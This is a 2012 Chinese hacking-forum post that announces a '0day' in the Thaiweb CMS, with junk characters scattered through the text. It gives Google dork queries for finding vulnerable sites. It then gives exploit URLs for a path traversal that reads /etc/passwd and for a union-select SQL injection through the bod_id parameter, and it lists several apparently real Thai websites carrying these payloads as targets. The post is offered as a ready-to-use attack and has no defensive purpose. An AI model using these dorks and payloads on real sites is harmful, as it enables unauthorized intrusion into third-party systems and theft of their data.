找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2182|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
( R1 s" U8 r/ h  v" h: K( m. q4 z5 x9 Y4 v& J
intext:powered by Thaiweb
* w- ~' I' r/ D8 s: l, @/ Y/ h: n/ H
2 H& z5 ^3 A4 minurl:index.php?page=board.php
/ H6 q. |7 b0 D/ d& v2 q1 L# i1 ^9 ?( `7 Y* k$ t7 a5 Q

& S, O# d# G/ N( H8 K' O' r' M# {2 s3 k: v! ]* D* V) c8 _
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd9 }) H" J8 ~7 T2 u

+ x! l  \6 ~4 K" S3 |* f. g% l 6 }( o- u4 o! ]/ n, E- l5 [. Y. W; W
% L: ?8 E3 E9 r. l
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'/ K9 F/ ~" e( ]$ f/ F' w
& D( ^' P1 i; o, q

. V& W' P5 W# M3 K$ b! u/ N% n& D1 q9 q6 }
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 T$ u# n; C7 ]' e1 M
3 O, n  I+ B4 g/ Q6 x7 r3 Y
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 L- B+ u" Y& x1 W
* R5 G  O$ h5 l. c8 r
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
: i8 \' L* F  D- A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表